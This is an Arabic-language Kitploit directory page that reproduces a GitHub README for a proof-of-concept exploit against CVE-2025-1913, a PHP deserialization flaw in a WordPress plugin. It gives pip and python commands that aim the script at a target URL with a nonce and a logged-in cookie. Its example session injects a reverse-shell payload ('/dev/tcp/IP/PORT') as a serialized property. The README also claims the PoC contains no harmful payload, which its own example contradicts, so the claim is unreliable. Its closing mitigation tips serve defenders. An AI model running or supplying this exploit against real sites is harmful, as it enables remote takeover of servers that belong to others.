Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-1913-PoC — إثبات مفهوم (PoC) يوضح CVE-2025-1913، ويُظهر كيف يمكن أن تؤدي معالجة إلغاء التسلسل غير الآمنة في الإضافة إلى سلوك عالي التأثير في بيئات خاضعة للتحكم. يحتوي على حمولة ضارة للاختبار المصرح به فقط. يُستخدم حصريًا في مختبرات معزولة ولأغراض البحث الدفاعي. | Kitploit
أدوات/GitHubGitHub/s0haib518-ksa/cve-2025-1913-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubs0haib518-ksa/cve-2025-1913-poc

CVE-2025-1913-PoC

إثبات مفهوم (PoC) يوضح CVE-2025-1913، ويُظهر كيف يمكن أن تؤدي معالجة إلغاء التسلسل غير الآمنة في الإضافة إلى سلوك عالي التأثير في بيئات خاضعة للتحكم. يحتوي على حمولة ضارة للاختبار المصرح به فقط. يُستخدم حصريًا في مختبرات معزولة ولأغراض البحث الدفاعي.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
21منذ 8 أشهرلم تتم المراجعة بعد
مشاركة

CVE-2025-1913 -- إثبات المفهوم (PoC)

يحتوي هذا المستودع على إثبات مفهوم تعليمي فقط لـ CVE-2025-1913، من إنشاء Suhaib518 🇸🇦. يوضح إثبات المفهوم هذا كيف يمكن لمدخلات PHP المسلسلة المصممة خصيصًا أن تؤدي إلى تفعيل منطق قابل للاستغلال في مكونات ووردبريس المتأثرة. إثبات المفهوم آمن ولا يتضمن حمولات ضارة.

⚠️ إخلاء مسؤولية: إثبات المفهوم هذا مخصص للتعلم والبحث واختبار الأمان الدفاعي فقط. لا تستخدمه على خوادم لا تملكها أو ليس لديك إذن صريح لاختبارها.


📌 نظرة عامة

الضعف موجود بسبب المعالجة غير الآمنة لبيانات PHP المسلسلة في سير عمل معينة لإضافات ووردبريس. يُظهر إثبات المفهوم هذا كيف يمكن لمهاجم تقديم هياكل مسلسلة مصممة تسبب سلوكًا داخليًا غير مقصود.

يتضمن هذا المستودع سكربت بايثون يقوم بما يلي:

  • بناء كائنات PHP مسلسلة مخصصة
  • تشفيرها لنقاط نهاية تصدير ووردبريس المبنية على AJAX
  • إرسال طلب مُتحكم به لإظهار المشكلة بأمان

📂 الملفات في هذا المستودع

root@kitploit:~
.
├── CVE-2025-1913-PoC.py         # سكربت إثبات المفهوم من إنشاء Suhaib518 المملكة العربية السعودية
└── README.md                    # التوثيق

🚀 الاستخدام

1. تثبيت المتطلبات

يستخدم السكربت وحدات بايثون المضمنة فقط باستثناء requests:

root@kitploit:~
pip install requests

2. تشغيل سكربت الاستغلال التفاعلي

root@kitploit:~
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"

سيُطلب منك:

  • عد الخصائص التي تريد تضمينها
  • الاسم والقيمة لكل خاصية

سيقوم السكربت بعد ذلك بتسلسلها، بناء طلب ووردبريس، وإرساله.


✔️ مثال أمر (تيار الاستغلال الناجح)

فيما يلي مثال أمر يوضح الاستخدام بقيم توضيحية (هذه ليست ضارة، بل تُظهر العملية فقط):

root@kitploit:~
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"

أمثلة لإجابات الأسئلة التفاعلية:

root@kitploit:~
[?] كم خاصية تمتلك هذه الفئة؟ 2
[?] اسم الخاصية #1: file
[?] القيمة لـ 'file': shell.sh
[?] اسم الخاصية #2: shell
[?] القيمة لـ 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1

سيقوم السكربت بعد ذلك بطباعة:

root@kitploit:~
[*] جاري إرسال الطلب…
....تحقق من المستمع للحصول على الشل.

🛡️ التخفيف (على المستوى العالي)

  • تجنب استخدام unserialize() على مدخلات غير موثوقة
  • تحقق من جميع معاملات النماذج وطلبات AJAX
  • حافظ على تحديث الإضافات
  • استخدم صيغ بيانات حديثة مثل JSON بدلاً من تسلسل PHP

📜 الترخيص

رخصة MIT.


🙌 المؤلف

من إنشاء Suhaib518 🇸🇦.

تنزيل الأداة